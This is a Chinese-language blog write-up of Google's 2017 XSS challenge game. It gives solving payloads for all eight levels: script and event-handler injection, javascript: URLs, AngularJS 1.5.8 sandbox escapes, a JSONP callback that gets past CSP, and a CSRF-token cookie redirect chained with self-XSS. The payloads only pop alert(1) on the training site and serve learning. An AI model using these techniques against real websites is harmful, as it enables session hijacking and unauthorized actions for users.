Google xss挑战赛(2017) writeup
前言
这是去年的谷歌xss挑战赛,偶然之间碰到,对于我这种xss小白来说,还是收获了不少。
这里的xssgame通关要求是只要弹出alert窗口就OK,共八关。Let's go.
地址: http://www.xssgame.com (需翻墙)
Level 1
url: http://www.xssgame.com/f/m4KKGHi2rVUN/?query=%3Cscript%3Ealert(1)%3C/script%3E
Level 2
url: http://www.xssgame.com/f/WrfpuKFX8GNr/?timer=1
这是一个定时器,代码如下
问题出在parseInt(seconds)上,当我们提交seconds='-alert(1)-'时候,执行语句就变长
parseInt(''-alert(1)-'') 我们可以在浏览器控制台运行一下这一句。
这里并非是parseInt函数的问题,而是浏览器先解释运行alert(1),然后再做了两个减法。我们将parseInt换成其他函数也是同样的效果。
提交: http://www.xssgame.com/f/WrfpuKFX8GNr/?timer='-alert(1)-'
Level 3
url: http://www.xssgame.com/f/u0hrDTsXmyVJ/#1
很显然是用img标签闭合,onerror触发,但这里我踩了一个坑。谷歌浏览器可以触发,火狐不行,火狐会进行一次urlendode导致无法闭合标签。
提交: http://www.xssgame.com/f/u0hrDTsXmyVJ/#'onerror=alert(1)>
火狐
Level 4
url: http://www.xssgame.com/f/__58a1wgqGgI/
view-source:http://www.xssgame.com/f/__58a1wgqGgI/confirm?next=xsss
payload相信都见过,一时没想起来是在这里可以用的。菜得飞起。
提交: http://www.xssgame.com/f/__58a1wgqGgI/confirm?next=javascript:alert(1)
Level 5
url: http://www.xssgame.com/f/JFTG_t7t3N-P/
这是一个搜索框,页面虽然有输出,但是会将字符实体化,编码绕过无效。
关键点在这里。
angular JS 是一个前端框架,爆过模板注入漏洞。
参考文章:
AngularJS沙箱绕过:反射型XSS导致麦当劳用户密码泄露
Angular JS模板注入漏洞分析
这里框架版本是1.5.8版本
这里可以找到许多版本的poc:http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
回到题目,
提交:http://www.xssgame.com/f/JFTG_t7t3N-P/??utm_term=&utm_campaign={{x%20=%20{%27y%27:%27%27.constructor.prototype};%20x[%27y%27].charAt=[].join;$eval(%27x=alert(1)%27);}}
按网上已有wp提交过不了,不知道为什么这里卡住了
Level 6
url: http://www.xssgame.com/f/rWKWwJGnAeyi/
奥不会...wp都没看懂
提交?query={{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
Level 7
url:http://www.xssgame.com/f/wmOM2q5NJnZS/
keywords是csp
menu参数base64编码,jsonp加载了一个页面
碰巧前一天看了spleated的这篇JSONP利用,了解了一些关于jsonp的内容。
系统的介绍jsonp可以参考这篇文章JSONP安全攻防技术
xss在menu里面,根据上面的参考文章
我们提交<script src="jsonp?callback=alert(1)%3b%2f%2f"></script>base64编码后的代码 PHNjcmlwdCBzcmM9Impzb25wP2NhbGxiYWNrPWFsZXJ0KDEpJTNiJTJmJTJmIj48L3NjcmlwdD4=
Level 8
url: http://www.xssgame.com/f/d9u16LTxchEi/
关键词是CSRF
懵逼了半天,贴一下别人的writeup
The last one mixes the previous challenges into one: the exploit must work for any user, logged in or not, and CSRF, self-XSS and CSP should be exploited in order to win, the introduction says.
It is possible to execute bank transfers logging into an account by username (optional) and sending a transfer with ‘name’ and ‘amount’ values. After the login a ‘username’ cookie is set containing the username entered, name and amount of the transfer are sent as GET parameters, alongside a random 16 bytes CSRF token saved as cookie. CSP is defined like level 7.
Looking into the transfer procedure it is clear the amount field is vulnerable to reflected XSS and the CSP is not defined, however it is just the ‘self-XSS’ part of the challenge and it works only with a ‘csrf_token’ parameter matching the homonym cookie.
During the ‘login’ procedure we notice a request to <challenge url>/set?name=username&value=<username entered>&redirect=index, which would set our ‘username’ cookie and send us back to the homepage.
Using this ‘feature’ we can set an arbitrary cookie with an arbitrary value and redirect the user to an arbitrary page. In our case we can set the ‘csrf_token’ cookie and redirect the user to ‘/transfer’ where the transfer will be executed because the cookie and the ‘csrf_token’ GET parameter match:
<challenge url>/set?name=csrf_token&value=arbitrary&redirect=url_encode(/transfer?name=attacker&amount=3"><script>alert(1)</script>&csrf_token=arbitrary)
(using url_encode for better readability, the argument should be url-encoded in the URL.)
自×xss:
http://www.xssgame.com/f/d9u16LTxchEi/transfer?name=deen&amount=3%22%3E%3Cscript%3Ealert(1)%3C/script%3E&csrf_token=IF0BSGV0XH
运用redirect重定向csrf
提交:
http://www.xssgame.com/f/d9u16LTxchEi/set?name=csrf_token&value=IF0BSGV0XH&redirect=transfer?name=deen&amount=3"><script>alert(1)</script>&csrf_token=IF0BSGV0XH
要进行urlencode
http://www.xssgame.com/f/d9u16LTxchEi/set?name=csrf_token&value=IF0BSGV0XH&redirect=transfer%3Fname%3Ddeen%26amount%3D3%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%26csrf_token%3DIF0BSGV0XH
